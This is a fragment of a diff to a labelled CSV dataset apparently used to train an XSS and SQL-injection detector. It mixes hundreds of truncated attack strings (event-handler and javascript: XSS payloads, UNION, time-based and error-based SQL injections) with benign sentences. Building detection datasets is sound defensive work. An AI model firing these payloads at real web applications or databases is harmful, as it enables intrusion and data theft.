onpointerenter=alert(1)>XSS</thead>,1,XSS,6621 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2629 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10562 +"<code onkeydown=""alert(1)"" contenteditable>test</c",1,XSS,2241 "<a href=""javascript\x0A:javascript:alert(1)"" id=""f",1,XSS,545 -"x=""&quot;,alert(1)//"";",1,XSS,9400 -1 RLIKE SLEEP(5)# 1337,2,SQLi,11220 -1' ) or 9643 = ( select count ( * ) from domain.do,2,SQLi,13940 -"<menuitem onkeyup=""alert(1)"" contenteditable>test<",1,XSS,2390 -<progress id=x tabindex=1 onbeforedeactivate=alert,1,XSS,4262 -Fortnite servers are really bad today / today. Pro,0,normal,26502 -"-5013' ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,15904 -"-4849"" ) ) or ( 5005 = 9111 ) *9111 and ( ( ""catv""",2,SQLi,20318 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10584 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13580 -1%' ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ),2,SQLi,18277 -"&lt;A HREF=\""//www&#46;google&#46;com/\""&gt;XSS&lt",1,XSS,1055 -"1%"" or ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,22480 -<tr onpointerdown=alert(1)>XSS</tr>,1,XSS,5592 -Where's the therapy session?,0,normal,23660 -"-5757%"" ) or 6872 = 6872 and ( ""%"" = """,2,SQLi,21220 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4269 -Select the best route for your journey.,0,normal,24096 -1' ) as yjdg where 5262 = 5262 union all select nu,2,SQLi,19014 -Select your soar.,0,normal,25026 -1'+ ( select 'ozpm' where 6939 = 6939 rlike ( sele,2,SQLi,20895 -set,0,normal,23127 -"{""id"":null,""name"":""Liepard""}",0,normal,27122 -"<area onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,4536 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10547 -Select a fabric for the chair that picks up either,0,normal,25661 -"1"" ) as eibf where 5026 = 5026 and 4386 = utl_inad",2,SQLi,12675 -"<basefont onmouseenter=""alert(1)"">test</basefont>",1,XSS,2398 -<set onpointerenter=alert(1)>XSS</set>,1,XSS,4185 -<input onpointerdown=alert(1)>XSS</input>,1,XSS,2577 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2374 -1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||cha,2,SQLi,22131 -Insert the memory stick.,0,normal,22655 -Where's the closest beach?,0,normal,23496 -"{""id"":null,""name"":""Krookodile""}",0,normal,27312 -1'+ ( select 'zkuf' where 3591 = 3591 or char ( 11,2,SQLi,14105 -"RLIKE SLEEP(5) AND 1337""=""1337",2,SQLi,11237 -"<span draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,2516 -"<picture onmouseenter=""alert(1)"">test</picture>",1,XSS,4263 -1'+ ( select 'yahd' where 5850 = 5850,2,SQLi,21047 -"1"" ) as dezr where 2145 = 2145 or sleep ( 5 ) #",2,SQLi,19578 -1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch,2,SQLi,16800 -select pg_sleep ( 5 ) and ( ( 'vxxg' = 'vxxg,2,SQLi,15151 -"<img usemap=#x><map name=""x""><area href onfocusin=",1,XSS,5779 -Read on to find out how to select the right snowbl,0,normal,25755 -"<link oncut=""alert(1)"" contenteditable>test</link>",1,XSS,3696 -"1"" where 2547 = 2547 or sleep ( 5 ) #",2,SQLi,17095 -Insert the fresh batteries.,0,normal,22604 -"{""id"":null,""firstName"":""Ong"",""lastName"":""Guang"",""a",0,normal,26889 -select * from users where id = 1 <@<@ union select,2,SQLi,11721 -"<br oncopy=""alert(1)"" contenteditable>test</br>",1,XSS,4504 -"<rb onkeypress=""alert(1)"" contenteditable>test</rb",1,XSS,5874 -Select double-check.,0,normal,24569 -"{""id"":null,""firstName"":""Ann"",""lastName"":""Lee"",""add",0,normal,27280 -1' and 6240 = ( 'qqpjq'|| ( select case 6240 when ,2,SQLi,21528 -<img SRC='vbscript:document.vulnerable=true;'>,1,XSS,1496 -Delete the song.,0,normal,22840 -1' ) where 7646 = 7646 and 3580 = ( select count (,2,SQLi,13961 -"<style>@keyframes slidein {}</style><rb style=""ani",1,XSS,4092 -1 or 8315 = ( select count ( * ) from sysibm.systa,2,SQLi,22372 -"<menuitem onmouseleave=""alert(1)"">test</menuitem>",1,XSS,2889 -"1"" where 2619 = 2619 and 2823 = 5100#",2,SQLi,17715 -"<section onkeypress=""alert(1)"" contenteditable>tes",1,XSS,4929 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,17183 -<style>:target {color:red;}</style><nobr id=x styl,1,XSS,5207 -"<style>@keyframes x{}</style><button style=""animat",1,XSS,3320 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3575 +&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#,1,XSS,9402 +1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11222 +1' and 7533 = 7533 and 'frvk' = 'frvk,2,SQLi,13942 +<style>:target {color:red;}</style><svg id=x style,1,XSS,2391 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4264 +"{""id"":null,""name"":""sat older paint frog""}",0,normal,27497 +"1"" ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105",2,SQLi,15906 +Locate items where necessary.,0,normal,23248 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10586 +select dbms_pipe.receive_message ( chr ( 112 ) ||c,2,SQLi,13582 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,18804 +"&lt;A HREF=\""//google\""&gt;XSS&lt;/A&gt;",1,XSS,1056 +select ( case when ( 8689 = 2468 ) then 8689 else ,2,SQLi,21371 +"<tr onmouseup=""alert(1)"">test</tr>",1,XSS,5594 +"{""id"":null,""firstName"":""Gotk"",""lastName"":""Han Jian",0,normal,27619 +1' or ( select 2* ( if ( ( select * from ( select ,2,SQLi,17739 +<listing id=x tabindex=1 onfocus=alert(1)></listin,1,XSS,4271 +"1"" ) as jmwr where 5978 = 5978 rlike ( select ( ca",2,SQLi,22467 +"1"" ) as ffon where 2738 = 2738 and 3754 = ( select",2,SQLi,19012 +Select your glide.,0,normal,25023 +1 ) as mwcs where 2544 = 2544 and exp ( ~ ( select,2,SQLi,20893 +having,0,normal,23124 +"{""id"":null,""name"":""pound""}",0,normal,27120 +"<h1 onbeforecut=""alert(1)"" contenteditable>test</h",1,XSS,4538 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10549 +"""We'd say, 'Why didn't you select Indy?' and they ",0,normal,26445 +1'|| ( select 'epjf' from dual where 8584 = 8584 a,2,SQLi,12677 +"<article onkeypress=""alert(1)"" contenteditable>tes",1,XSS,2399 +<frame onpointerout=alert(1)>XSS</frame>,1,XSS,4187 +"<figcaption onclick=""alert(1)"">test</figcaption>",1,XSS,2578 +"<blink onkeyup=""alert(1)"" contenteditable>test</bl",1,XSS,2375 +And you select objects and life forms to go in.,0,normal,26361 +Create a soothing melody.,0,normal,22652 +Modify the code.,0,normal,22851 +"{""id"":null,""firstName"":""Linda"",""lastName"":""Phua"",""",0,normal,27311 +1'+ ( select 'uqaf' where 7414 = 7414,2,SQLi,14107 +")) RLIKE SLEEP(5) AND ((1337"" LIKE ""1337",2,SQLi,11239 +"<thead draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,2517 +<custom tags onpointerdown=alert(1)>XSS</custom ta,1,XSS,4265 +select sleep ( 5 ) and ( ( ( 'thqr' like 'thqr,2,SQLi,21080 +1%' ) ) waitfor delay '0:0:5' and ( ( '%' = ',2,SQLi,19576 +"1%"" ) ) ) and 6969 = ( select 6969 from pg_sleep (",2,SQLi,16802 +-3359' order by 1--,2,SQLi,15153 +<image id=x tabindex=1 onfocus=alert(1)></image>,1,XSS,5781 +-8809'|| ( select 'hyzr' where 5694 = 5694 union a,2,SQLi,21404 +"<style>@keyframes x{}</style><svg style=""animation",1,XSS,3698 +1 ) as iqkf where 7780 = 7780,2,SQLi,17097 +Where's the missing ingredient?,0,normal,22601 +"{""id"":null,""name"":""halfway college""}",0,normal,26886 +anything' OR 'x' = 'x,2,SQLi,11723 +<strong id=x tabindex=1 onfocus=alert(1)></strong>,1,XSS,4506 +"<kbd draggable=""true"" ondragend=""alert(1)"">test</k",1,XSS,5876 +Select confirm.,0,normal,24566 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,21421 +1%' ) ) ) or 7552 = ( select count ( * ) from rdb$,2,SQLi,21526 +1script3document.vulnerable=true;1/script3,1,XSS,1497 +Create a plan.,0,normal,22837 +"-6389"" union all select 2355,2355,2355,2355,2355--",2,SQLi,13963 +<template id=x tabindex=1 onfocus=alert(1)></templ,1,XSS,4094 +"1 where 7757 = 7757 and updatexml ( 3393,concat ( ",2,SQLi,22370 +"<xmp oncontextmenu=""alert(1)"">test</xmp>",1,XSS,2890 +"-9227 ) where 6723 = 6723 union all select 6723,67",2,SQLi,17713 +"<frameset onmousedown=""alert(1)"">test</frameset>",1,XSS,4931 +"-8538"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +",2,SQLi,17185 +<optgroup onpointerdown=alert(1)>XSS</optgroup>,1,XSS,5209 +"<style>@keyframes slidein {}</style><dfn style=""an",1,XSS,3322 +<noembed id=x tabindex=1 onfocus=alert(1)></noembe,1,XSS,3577 <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x7,1,XSS,917 --9841 where 4612 = 4612 union all select 4612--,2,SQLi,16912 -( select ( case when ( 1343 = 1343 ) then ( select,2,SQLi,21227 -; if is_srvrolemember('sysadmin') > 0 waitfor dela,2,SQLi,11137 -><svg/onload=alert(/XSS/),1,XSS,9698 -"Cyril and Augustine differ, as we should expect, i",0,normal,26252 -<multicol onpointerdown=alert(1)>XSS</multicol>,1,XSS,6265 -I'm considering where to go for a cultural experie,0,normal,23880 -"-6333"" ) ) ) union all select 9851,9851,9851,9851,",2,SQLi,12420 -"<th ondblclick=""alert(1)"">test</th>",1,XSS,4020 -1' where 3339 = 3339 and 3824 = benchmark ( 500000,2,SQLi,15457 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,17159 -"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,18884 -1%' ) rlike sleep ( 5 ) and ( '%' = ',2,SQLi,19151 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6430 -1 ) as uhmm where 2304 = 2304 union all select nul,2,SQLi,17465 -"1%"" ) ) ) and 2006 = 2006",2,SQLi,20756 -"<area draggable=""true"" ondrag=""alert(1)"">test</are",1,XSS,2751 -1' ) ) ) or 4411 = ( select count ( * ) from sysus,2,SQLi,22158 -I want to select a playlist for my road trip.,0,normal,23695 -1' where 9116 = 9116 and char ( 107 ) ||char ( 121,2,SQLi,22471 -1%' ) union all select null#,2,SQLi,16451 -1'|| ( select 'djoe' from dual where 8063 = 8063 (,2,SQLi,20658 -1'|| ( select 'dpje' where 2704 = 2704 or char ( 7,2,SQLi,19382 +1' ) or 8315 = ( select count ( * ) from sysibm.sy,2,SQLi,16914 +"1"" ) ) ) or sleep ( 5 ) #",2,SQLi,21225 +; if not((select serverproperty('isintegratedsecur,2,SQLi,11139 +<textarea autofocus onfocus=alert(1)>,1,XSS,9700 +Dan Nathan is a seller the Financial Select SPDR E,0,normal,26249 +"<del onmouseenter=""alert(1)"">test</del>",1,XSS,6267 +COM: up to 70 percent off luxury labels Michael Ko,0,normal,26272 +"1"" ) as xioc where 7260 = 7260 or elt ( 5873 = 587",2,SQLi,12422 +"<listing draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,4022 +"1%"" ) ) or sleep ( 5 ) #",2,SQLi,15459 +"1' in boolean mode ) and extractvalue ( 7982,conca",2,SQLi,17161 +1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||,2,SQLi,18882 +1%' ) ) and 9254 = ( select count ( * ) from rdb$f,2,SQLi,19149 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6432 +1 ) ) as skex where 7941 = 7941 and sleep ( 5 ) --,2,SQLi,17463 +"1"" ) ) as rrms where 8185 = 8185 union all select ",2,SQLi,20754 +"<IMG SRC=`javascript:alert(""RSnake says, ''"")`>",1,XSS,2752 +1' ) ) and exp ( ~ ( select * from ( select concat,2,SQLi,22156 +I need to select the right book to read.,0,normal,23692 +"-9133"" ) ) or 4747 = dbms_utility.sqlid_to_sqlhash",2,SQLi,22468 +"1"" ) ) as ecnn where 8913 = 8913 or char ( 68 ) ||",2,SQLi,16453 +"1%' ) ) ) procedure analyse ( extractvalue ( 9255,",2,SQLi,20656 +These he cannot remove nor select; and he is bound,0,normal,25324 /><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:,1,XSS,599 -<ul id=x tabindex=1 onactivate=alert(1)></ul>,1,XSS,4002 -or 'unusual' = 'unusual',2,SQLi,10098 -1 ) rlike ( select ( case when ( 7689 = 7689 ) the,2,SQLi,20113 -"1 where 2363 = 2363 union all select null,null,nul",2,SQLi,20327 -"-1844' ) union all select 9572,9572,9572,9572#",2,SQLi,19860 -<basefont onpointermove=alert(1)>XSS</basefont>,1,XSS,5673 -"<style>@keyframes x{}</style><section style=""anima",1,XSS,6218 -Randomly select a wedding favor.,0,normal,24405 -1'|| ( select 'osty' from dual where 6433 = 6433 o,2,SQLi,17249 -"1%"" and 1343 = 5939#",2,SQLi,20367 -"1"" where 5353 = 5353 and exp ( ~ ( select * from (",2,SQLi,15472 -"<slot ondblclick=""alert(1)"">test</slot>",1,XSS,5081 --7610' or 3038 = 3038,2,SQLi,15391 -"1' ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706",2,SQLi,19951 -1%' rlike sleep ( 5 ) and '%' = ',2,SQLi,19941 -"1"" ) ) ) and 8189 = ( select count ( * ) from sysi",2,SQLi,19996 -")))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11037 -select * from users where id = '1' or \< = 1 union,2,SQLi,11937 -&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;,1,XSS,1447 -( select ( case when ( 1421 = 1421 ) then 1 else 1,2,SQLi,21947 -Select that and the driver will know what to do.,0,normal,25608 -<button onError=javascript:alert(1)>,1,XSS,9612 -"1"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ",2,SQLi,15857 -1' ) as rbpx where 1264 = 1264,2,SQLi,12129 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,20871 -1'+ ( select cjcp where 2590 = 2590 union all sele,2,SQLi,14380 -<optgroup id=x tabindex=1 onfocus=alert(1)></optgr,1,XSS,7310 -"<a onmouseout=""alert(1)"">test</a>",1,XSS,7035 +<h1 id=x tabindex=1 onfocusin=alert(1)></h1>,1,XSS,4004 +\x27UNION SELECT,2,SQLi,10100 +"1%"" ) ) or 1022 = ( select count ( * ) from all_us",2,SQLi,17771 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,20325 +1' ) ) ) and exp ( ~ ( select * from ( select conc,2,SQLi,19858 +<datalist id=x tabindex=1 onactivate=alert(1)></da,1,XSS,5675 +"<label onmouseup=""alert(1)"">test</label>",1,XSS,6220 +Select the perfect wedding venue.,0,normal,24402 +"1"" ) as ivkw where 4218 = 4218 union all select nu",2,SQLi,17251 +1'+ ( select 'rpbx' where 6748 = 6748 and elt ( 42,2,SQLi,17984 +"-9180"" or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,15474 +"<track draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,5083 +"1, ( case when 6620 = 3092 then 1 else null end )",2,SQLi,15393 +"1"" ) ) ) and 8635 = ( select count ( * ) from gene",2,SQLi,19949 +"1' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76",2,SQLi,19939 +some,0,normal,23183 +")))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11039 +", begin declare @var varchar ( 8000 ) set @var = '",2,SQLi,11939 +&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;,1,XSS,1448 +"1"" ) ) and 9198 = 9198--",2,SQLi,18394 +"1"" ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,19993 +<button onFilterChange=javascript:alert(1)>,1,XSS,9614 +1%' ) ) ) and exp ( ~ ( select * from ( select con,2,SQLi,15859 +if ( 8284 = 6171 ) select 8284 else drop function ,2,SQLi,12131 +1' where 5778 = 5778,2,SQLi,22187 +"1' and make_set ( 8403 = 8403,8899 )",2,SQLi,14382 +<style onblur=alert(1) tabindex=1 id=x></style><in,1,XSS,7312 +"<A HREF=""http://0102.0146.0007.00000223/""></A>",1,XSS,7037 "{""id"":null,""name"":""drawn instead""}",0,normal,27424 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2838 -1' and 7533 = 7533,2,SQLi,19406 -"<strong onmouseout=""alert(1)"">test</strong>",1,XSS,3219 -)) WAITFOR DELAY '0:0:5'--,2,SQLi,11325 -select sleep ( 5 ) and 'hhrw' like 'hhrw,2,SQLi,21133 -Find data where valid.,0,normal,23331 -"Up to 20% off select Outdoor Storage, Coolers, and",0,normal,25221 -<svg id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,4696 -"<span oncut=""alert(1)"" contenteditable>test</span>",1,XSS,5242 -"select * from users where id = 1 or ""?,"" or 1 = 1 ",2,SQLi,11546 -Select unwrap.,0,normal,24694 -and 'one'='one,2,SQLi,9951 -<hr onpointerenter=alert(1)>XSS</hr>,1,XSS,7339 -Just select the Amazon Music Unlimited option befo,0,normal,25928 -Where did you find that serene retreat?,0,normal,23937 -<style>:target {color: red;}</style><xmp id=x styl,1,XSS,6807 -"{""id"":null,""firstName"":""Kevin"",""lastName"":""Tan"",""s",0,normal,26935 -Select your modify.,0,normal,25040 -"<center onmousemove=""alert(1)"">test</center>",1,XSS,4483 -"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000",2,SQLi,10416 -1 ) where 3671 = 3671,2,SQLi,22155 -Select your offer.,0,normal,24946 -"<progress onmouseenter=""alert(1)"">test</progress>",1,XSS,4484 -1' in boolean mode ) and char ( 120 ) ||char ( 106,2,SQLi,21253 -"1"" where 1132 = 1132 or 6793 = ( select 6793 from ",2,SQLi,15226 -"<handler xmlns:ev=""http://www.w3.org/2001/xml-even",1,XSS,9181 -Launching in select Saks Fifth Avenue locations an,0,normal,25912 -1 ) ) as qzmg where 4344 = 4344 procedure analyse ,2,SQLi,22047 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10525 -Select your debate.,0,normal,24909 -"<noembed onmousemove=""alert(1)"">test</noembed>",1,XSS,7235 -"-1148"" ) ) union all select 5442,5442,5442,5442#",2,SQLi,17637 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4609 -1 ) and 9198 = 9198--,2,SQLi,16885 -Select trail.,0,normal,24660 -Where's the SQL manual?,0,normal,23403 -"-3442' in boolean mode ) union all select 6255,625",2,SQLi,17431 -"<iframe src=""http://example.org/""></iframe>",1,XSS,9194 -Create a beautiful mural in your room.,0,normal,22954 -1%' ) ) rlike ( select * from ( select ( sleep ( 5,2,SQLi,19633 -"1%"" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) |",2,SQLi,15121 -1' where 1836 = 1836 or char ( 119 ) ||char ( 100 ,2,SQLi,12879 -"1"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""xjdh""",2,SQLi,18937 -Select prefer.,0,normal,24744 -&#x000003c,1,XSS,1075 -1'+ ( select 'suzs' where 2905 = 2905 and 4241 = c,2,SQLi,21352 -1' or exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,13818 -"-8929' union all select 5324,5324,5324,5324,5324,5",2,SQLi,19287 +"<data onkeyup=""alert(1)"" contenteditable>test</dat",1,XSS,2839 +"1%' ) ) ) and extractvalue ( 7982,concat ( 0x5c,0x",2,SQLi,19404 +"<noframes onclick=""alert(1)"">test</noframes>",1,XSS,3221 +%' WAITFOR DELAY '0:0:5'--,2,SQLi,11327 +Modify your car.,0,normal,22828 +select pg_sleep ( 5 ) and 'qfaz' like 'qfaz,2,SQLi,21341 +"Up to 30% off select Cuisinart grills, smokers, an",0,normal,25218 +<tfoot onpointerover=alert(1)>XSS</tfoot>,1,XSS,4698 +<h1 onpointerover=alert(1)>XSS</h1>,1,XSS,5244 +"1 or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11548 +Select expose.,0,normal,24691 +group by password having 1=1--,2,SQLi,9953 +"<summary draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,7341 +1' ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ,2,SQLi,19425 +Let's decide where to go for a relaxing day.,0,normal,23934 +<svg><tt onload=alert(1)></tt>,1,XSS,6809 +"{""id"":null,""name"":""Ophanimon""}",0,normal,26932 +Select your shift.,0,normal,25037 +"<style>@keyframes x{}</style><html style=""animatio",1,XSS,4485 +"ORDER BY 1,SLEEP(5)",2,SQLi,10418 +"1%"" ) and 9254 = ( select count ( * ) from rdb$fie",2,SQLi,22153 +Select your application.,0,normal,24943 +<menuitem onpointerup=alert(1)>XSS</menuitem>,1,XSS,4486 +1 ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ),2,SQLi,21251 +1'|| ( select 'hrpa' where 1973 = 1973 union all s,2,SQLi,15228 +<html ontouchcancel=alert(1)>,1,XSS,9183 +Select your decide.,0,normal,25001 +"1"" ) rlike sleep ( 5 ) and ( ""rfsd"" = ""rfsd",2,SQLi,19246 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10527 +Select your chat.,0,normal,24906 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7237 +"1 and 3202 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,20985 +"<dl onpaste=""alert(1)"" contenteditable>test</dl>",1,XSS,4611 +"1' ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( ",2,SQLi,16887 +Select guide.,0,normal,24657 +select sleep ( 5 ) and ( 'pwpc' = 'pwpc,2,SQLi,21606 +"1' where 6721 = 6721 union all select null,null,nu",2,SQLi,17433 +<iframe src=%22404%22 onload=%22content.frames[0].,1,XSS,9196 +Modify the privacy settings for your account.,0,normal,22951 +"-3438"" ) or 1570 = convert ( int, ( select char ( ",2,SQLi,19631 +1' ) ) as qaki where 5272 = 5272,2,SQLi,15123 +if ( 5896 = 4251 ) select 5896 else drop function ,2,SQLi,12881 +-3581'|| ( select 'uxmh' from dual where 8954 = 89,2,SQLi,18935 +Select hate.,0,normal,24741 +&#x3c;,1,XSS,1076 +"-5227"" union all select 2666--",2,SQLi,20596 +1 ) ) ) and 8514 = ( select count ( * ) from domai,2,SQLi,13820 +"After the board is ready, select items from around",0,normal,26399 "<P STYLE=""behavior:url('#default#time2')"" end=""0"" ",1,XSS,778 --8828%' ) ) ) or 4144 = ( select upper ( xmltype (,2,SQLi,17640 -"1, ( convert ( int, ( select char ( 113 ) +char ( ",2,SQLi,20127 -“><script>alert(“XSS”)</script>,1,XSS,9387 -onclick=alert(1)//<button ‘ onclick=alert(1)//> */,1,XSS,9554 -"1"" ) ) as uqem where 3521 = 3521",2,SQLi,21160 -1' ) or 5286 = ( select count ( * ) from all_users,2,SQLi,21015 --8716' ) where 5523 = 5523 or 3686 = 8485--,2,SQLi,18296 -1 ) where 2232 = 2232,2,SQLi,12599 -"<blockquote oncopy=""alert(1)"" contenteditable>test",1,XSS,6084 -1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||cha,2,SQLi,21909 -"select * from users where id = 1 or 1#"". union sel",2,SQLi,11447 -"1' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( (",2,SQLi,21914 -1' ) where 7561 = 7561 and 8514 = ( select count (,2,SQLi,13114 -"<menuitem onbeforecut=""alert(1)"" contenteditable>t",1,XSS,5891 -"getURL(""javascript:alert('XSS')"")",1,XSS,9380 -"-3865"" ) where 3559 = 3559 union all select 3559,3",2,SQLi,18012 -<http://onxxx%3D1/,1,XSS,9188 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10475 -"<div id=""97""><!-- IE 5-9 -->",1,XSS,9157 -<sup onblur=alert(1) tabindex=1 id=x></sup><input ,1,XSS,6006 +"1"" ) ) or 8315 = ( select count ( * ) from sysibm.",2,SQLi,17638 +1' ) as pghp where 9086 = 9086,2,SQLi,20125 +"[alert][0].call(this,1)",1,XSS,9389 +"><iframe src=javascript:alert(XSS)"">",1,XSS,9556 +"-3758' ) ) union all select 9460,9460,9460,9460,94",2,SQLi,19950 +1' where 7504 = 7504 and char ( 120 ) ||char ( 106,2,SQLi,21013 +"-8258"" ) ) as swjp where 2681 = 2681 union all sel",2,SQLi,21617 +1' ) ) ) and 8594 = ( select 8594 from pg_sleep ( ,2,SQLi,12601 +<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot,1,XSS,6086 +convert,0,normal,23227 +"select * from users where id = 1 or 1#""? or 1 = 1 ",2,SQLi,11449 +1' and 4386 = utl_inaddr.get_host_address ( chr ( ,2,SQLi,19757 +"-5661' ) ) union all select 3011,3011#",2,SQLi,13116 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5893 +"top[""al""+""ert""](1)",1,XSS,9382 +end and ( '%' = ',2,SQLi,18010 +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&N,1,XSS,9190 +"ORDER BY 1,SLEEP(5),3--",2,SQLi,10477 +"<div id=""99"">XXX<style>",1,XSS,9159 +"<main onmousemove=""alert(1)"">test</main>",1,XSS,6008 `'><script>\x00javascript:alert(1)</script>,1,XSS,566 -"<slot onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,5900 -"1"" where 3221 = 3221 or updatexml ( 1808,concat ( ",2,SQLi,21242 --7962' ) ) as pgqz where 6058 = 6058 or 4493 = utl,2,SQLi,13874 +"<hgroup onmousedown=""alert(1)"">test</hgroup>",1,XSS,5902 +-7843' where 5986 = 5986 or make_set ( 9354 = 9354,2,SQLi,21240 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,13876 "<iframe/src=""data:text/html;&Tab;base64&Tab;,PGJvZ",1,XSS,841 -<canvas id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,3889 -<svg/onload=alert(`INJECTX`)>,1,XSS,9835 -"<s onmouseout=""alert(1)"">test</s>",1,XSS,7642 -"-4091"" ) ) ) union all select 6694,6694--",2,SQLi,21435 -"<frameset onkeyup=""alert(1)"" contenteditable>test<",1,XSS,2667 -"1"" and sleep ( 5 ) and ""masm"" = ""masm",2,SQLi,18044 -"{""id"":null,""firstName"":""Kinki"",""lastName"":""Lws"",""a",0,normal,27201 -select ( case when ( 6961 = 7460 ) then 1 else 696,2,SQLi,12335 -<x contenteditable onpaste=alert(1)>paste here!,1,XSS,9342 -to select something,0,normal,25256 -<del id=x tabindex=1 onbeforeactivate=alert(1)></d,1,XSS,4093 -"-4168' ) union all select 2618,2618#",2,SQLi,16159 -1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) |,2,SQLi,12672 +"<plaintext onmouseup=""alert(1)"">test</plaintext>",1,XSS,3891 +<h1/onclick=alert(1)>a//INJECTX,1,XSS,9837 +"<section onkeydown=""alert(1)"" contenteditable>test",1,XSS,7644 +"1"" ) where 4426 = 4426 and 3715 in ( ( char ( 113 ",2,SQLi,21433 +<pre id=x tabindex=1 ondeactivate=alert(1)></pre><,1,XSS,2668 +"1"" ) where 5197 = 5197 and elt ( 3114 = 3114,sleep",2,SQLi,18042 +Save up to 37% off select Best Selling Arthritis G,0,normal,25713 +"1%"" ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ",2,SQLi,12337 +<x on%78xx=1,1,XSS,9344 +To unlock nokia mobile phones you should select th,0,normal,25253 +<noscript id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,4095 +1'|| ( select 'votg' where 5105 = 5105 or 8156 = (,2,SQLi,16161 +"1%' or row ( 1045,7562 ) > ( select count ( * ) ,c",2,SQLi,12674 "<STYLE>.XSS{background-image:url(""javascript:javas",1,XSS,766 -(sleep 5)--,2,SQLi,11344 -"-6116"" ) ) union all select 3679,3679,3679,3679,36",2,SQLi,18873 --4325 order by 1--,2,SQLi,20618 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,21264 -The chain's also testing out some new drinks in se,0,normal,25477 -"<form onmouseleave=""alert(1)"">test</form>",1,XSS,4866 -"1"" ) ) ) rlike sleep ( 5 ) #",2,SQLi,21252 -"<canvas onkeydown=""alert(1)"" contenteditable>test<",1,XSS,2621 -1'|| ( select 'abjv' from dual where 4200 = 4200,2,SQLi,20772 -<ruby id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,6710 -"<tt onpaste=""alert(1)"" contenteditable>test</tt>",1,XSS,3027 -"1"" and sleep ( 5 ) #",2,SQLi,17289 -<svg><section onload=alert(1)></section>,1,XSS,4103 -"-4615' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( (",2,SQLi,21904 -1' ) ) and ( select * from ( select ( sleep ( 5 ) ,2,SQLi,15832 -<ol onpointerenter=alert(1)>XSS</ol>,1,XSS,2023 -Where's the medical clinic?,0,normal,23623 -x”</title><img src%3dx onerror%3dalert(1)>,1,XSS,9386 -"<ins onmouseenter=""alert(1)"">test</ins>",1,XSS,2686 -Kohl's: Home 